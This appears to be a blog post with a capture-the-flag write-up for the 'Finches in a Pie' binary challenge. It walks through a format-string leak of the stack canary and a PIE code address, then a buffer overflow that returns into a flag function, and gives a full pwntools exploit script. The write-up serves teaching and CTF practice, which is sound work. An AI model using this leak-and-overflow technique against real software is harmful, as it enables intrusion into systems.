Finches in a Pie

Description

There’s a service at , exploit it to get the flag.

Files

fiap

flag.txt (You need this in same directory as fiap for local exploit. fiap will read flag once you exploit it)

Enumeration

checksec

Running the code

Static Analysis

flag function

say_hi function

It takes two inputs from the user. First input is printed.

Since PIE is enabled, we would need to leak the stack for canary and leak the code section to override the changed canary with correct canary and override the ret with flag.

Exploit

First we will use the first BoF and string format vulnerability to leak the address of say_hi+13 and stack_canary. Here we have to use “%#$p” where # is the offset in the stack instead of using many “%p” to reveal the stack. Because offset we want to look into will be overwritten by %p. offset 3 is say_hi+13 address and offset 11 is canary address.

Then we would need to figure out where canary and ret reside when you are doing second BoF. Once you figure that out, we can make exploit that has PADDING + Canary Address + Padding2 + RET Address(Here we want to return to flag function).

from pwn import *

isLocal = True

if isLocal:
    p = process("./fiap")
else:
    p = remote("95.216.233.106",17954)

p.recvline()
p.recvline()
p.recvline()
p.recvline()
p.recvline()
p.recvline()
p.recvline()
p.recvline()
p.recvline()
p.recvline()

p.sendline("%3$p %11$p ")
first_recv = p.recvline().split(" ")

SAY_HI_13 = int(first_recv[2], 16)
CANARY = int(first_recv[3] , 16)
FLAG = SAY_HI_13 - 134

PADDING = 'A' * 25

#
# Padding
# Canary
# Padding 2
# FLAG

PADDING2 = 'B' * 12

buf = ''
buf += PADDING
buf += p32(CANARY)
buf += PADDING2
buf += p32(FLAG)

p.sendline(buf)
p.recvline()
print(p.recvline())

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s